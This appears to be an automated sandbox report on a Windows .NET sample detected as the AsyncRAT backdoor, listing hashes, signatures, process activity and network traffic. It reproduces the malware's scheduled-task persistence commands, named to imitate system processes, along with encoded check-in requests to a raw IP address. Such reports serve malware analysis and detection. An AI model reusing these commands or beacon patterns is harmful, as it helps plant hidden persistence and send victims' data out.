Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 2, 2021, 5:51 p.m.	Aug. 2, 2021, 5:53 p.m.

Size	600.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`2ee557a2195e41069889ecbc983a87b1`
SHA256	`dd9d370fbb04aeef33b7a4e0e633b0613f54e8a971bf506e0efc2ac5de107c20`
CRC32	`57A54091`
ssdeep	`12288:gqnOtSU2oNb+VFv0KCip5NC9JOmMEWV8:g+OwcKV2KCY5XG`
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

fontWinRuntimecrtNetrefruntimedll.exe "C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe"
2388
- schtasks.exe "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f
  2760
- schtasks.exe "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f
  1420
- schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f
  2576
- schtasks.exe "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f
  2200
- schtasks.exe "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f
  2332
- fontWinRuntimecrtNetrefruntimedll.exe "C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe"
  2888
  - schtasks.exe "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f
    240
  - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f
    2064
  - schtasks.exe "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f
    1032
  - schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
    1232
  - schtasks.exe "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f
    1896
  - schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f
    2608
  - schtasks.exe "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f
    916
  - schtasks.exe "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f
    2092
  - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat"
    1768
    - chcp.com chcp 65001
      2316
    - PING.EXE ping -n 5 localhost
      2520
    - WmiPrvSE.exe "C:\PerfLogs\Admin\WmiPrvSE.exe"
      2680

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81
api.telegram.org	A 149.154.167.220	149.154.167.220

IP Address	Status	Action
149.154.167.220	Active	Moloch
164.124.101.2	Active	Moloch
34.117.59.81	Active	Moloch
78.24.217.56	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49223 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49223 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49224 -> 34.117.59.81:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.101:49224	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 34.117.59.81:443 -> 192.168.56.101:49223	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49223 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8
TLS 1.2 192.168.56.101:49224 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8

Queries for the computername (35 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2021, 5:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 2, 2021, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 2, 2021, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 2, 2021, 5:45 p.m.			0	0
IsDebuggerPresent Aug. 2, 2021, 5:45 p.m.			0	0
IsDebuggerPresent Aug. 2, 2021, 5:45 p.m.			0	0
IsDebuggerPresent Aug. 2, 2021, 5:45 p.m.			0	0

Command line console output was observed (15 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 2, 2021, 5:44 p.m.	buffer: SUCCESS: The scheduled task "fontWinRuntimecrtNetrefruntimedll" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:44 p.m.	buffer: SUCCESS: The scheduled task "wininit" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:44 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:44 p.m.	buffer: SUCCESS: The scheduled task "audiodg" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:44 p.m.	buffer: SUCCESS: The scheduled task "srvany" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "SearchIndexer" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "smss" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "taskhost" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "winlogon" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: SUCCESS: The scheduled task "explorer" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 2, 2021, 5:45 p.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 2, 2021, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001c417d60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2021, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001c417eb0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2021, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ad794b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 2, 2021, 5:44 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 2, 2021, 5:46 p.m.	stacktrace: 0x7fe91ce9c69 0x7fe91ce1bc4 mscorlib+0x4ef8a5 @ 0x7fef028f8a5 mscorlib+0x4ef609 @ 0x7fef028f609 mscorlib+0x4ef5c7 @ 0x7fef028f5c7 mscorlib+0x502d21 @ 0x7fef02a2d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef136f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef136f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef136f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef1536291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef1416d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef1416d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef1416c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef1416dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef1536175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef14a66ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 80 38 00 48 8b 4d 08 e8 4b cf 4a 5e 48 89 45 40 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe91ce9c69 registers.r14: 0 registers.r15: 0 registers.rcx: 483454344 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 483457648 registers.r11: 483451712 registers.r8: 4 registers.r9: 0 registers.rdx: 38549496 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 2, 2021, 5:46 p.m.

stacktrace:

0x7fe91ce9c69
0x7fe91ce1bc4
mscorlib+0x4ef8a5 @ 0x7fef028f8a5
mscorlib+0x4ef609 @ 0x7fef028f609
mscorlib+0x4ef5c7 @ 0x7fef028f5c7
mscorlib+0x502d21 @ 0x7fef02a2d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef136f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef136f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef136f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef1536291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef1416d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef1416d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef1416c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef1416dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef1536175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef14a66ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 80 38 00 48 8b 4d 08 e8 4b cf 4a 5e 48 89 45 40
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe91ce9c69
registers.r14: 0
registers.r15: 0
registers.rcx: 483454344
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 483457648
registers.r11: 483451712
registers.r8: 4
registers.r9: 0
registers.rdx: 38549496
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&9cb2beefe30f08fd6b229bb65bdf14a5=cbe8ead4e58ebaeb2d1f8262e2b19694&847db2de527380cc6f80ef60ca65913d=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&KmCgE=RmlX1zOMlkMdAM5jwvjI
suspicious_features	Connection to IP address	suspicious_request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIyYGN5EDN1MGNkdjZ1QmZyYjZ3QmZzITYxUzY1MDN0cDM2QWM1gDO4IiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W
suspicious_features	Connection to IP address	suspicious_request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W&ffd8a3463ee88805d4304008f2eca47a=QX9JiI6IyM3kTYmBTNjJTO5kjMyMjYmVWY2QDO4EmN5MGO2MWN1ICLiMWY0IGO3YGNjNDNihjNhBjM3UTN0AjYlVmYzQWN2MTZldDNldDNzYmI6IiY1ETZ4gTM0MGO3cDMwAjNwYGO2cTMzYWNwQzNkVWY5ICLiQDMzYWZwADNjBTYykDZ1czY5gDZ0QmYklDNzMDNxAzYjVGM0QzMxYjI6ICMkV2Y4YzNjRDNzITZkVGMzgTM5YWOhNWNzYWY0MmYxIyes0nIw4WS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplUV5sWUp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMzN5EmZwUzYykTO5IjMzImZlFmN0gDOhZTOjhjNjVTNiwiI3ATY2IjZkZjY2MWYzM2N2YDZzkDM2ImMmFWNhF2MhVWM2MmZyIzYhJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W
suspicious_features	GET method with no useragent header	suspicious_request	GET https://ipinfo.io/json

Performs some HTTP requests (4 events)

request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&9cb2beefe30f08fd6b229bb65bdf14a5=cbe8ead4e58ebaeb2d1f8262e2b19694&847db2de527380cc6f80ef60ca65913d=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&KmCgE=RmlX1zOMlkMdAM5jwvjI
request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIyYGN5EDN1MGNkdjZ1QmZyYjZ3QmZzITYxUzY1MDN0cDM2QWM1gDO4IiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W
request	GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W&ffd8a3463ee88805d4304008f2eca47a=QX9JiI6IyM3kTYmBTNjJTO5kjMyMjYmVWY2QDO4EmN5MGO2MWN1ICLiMWY0IGO3YGNjNDNihjNhBjM3UTN0AjYlVmYzQWN2MTZldDNldDNzYmI6IiY1ETZ4gTM0MGO3cDMwAjNwYGO2cTMzYWNwQzNkVWY5ICLiQDMzYWZwADNjBTYykDZ1czY5gDZ0QmYklDNzMDNxAzYjVGM0QzMxYjI6ICMkV2Y4YzNjRDNzITZkVGMzgTM5YWOhNWNzYWY0MmYxIyes0nIw4WS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplUV5sWUp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMzN5EmZwUzYykTO5IjMzImZlFmN0gDOhZTOjhjNjVTNiwiI3ATY2IjZkZjY2MWYzM2N2YDZzkDM2ImMmFWNhF2MhVWM2MmZyIzYhJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 230 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
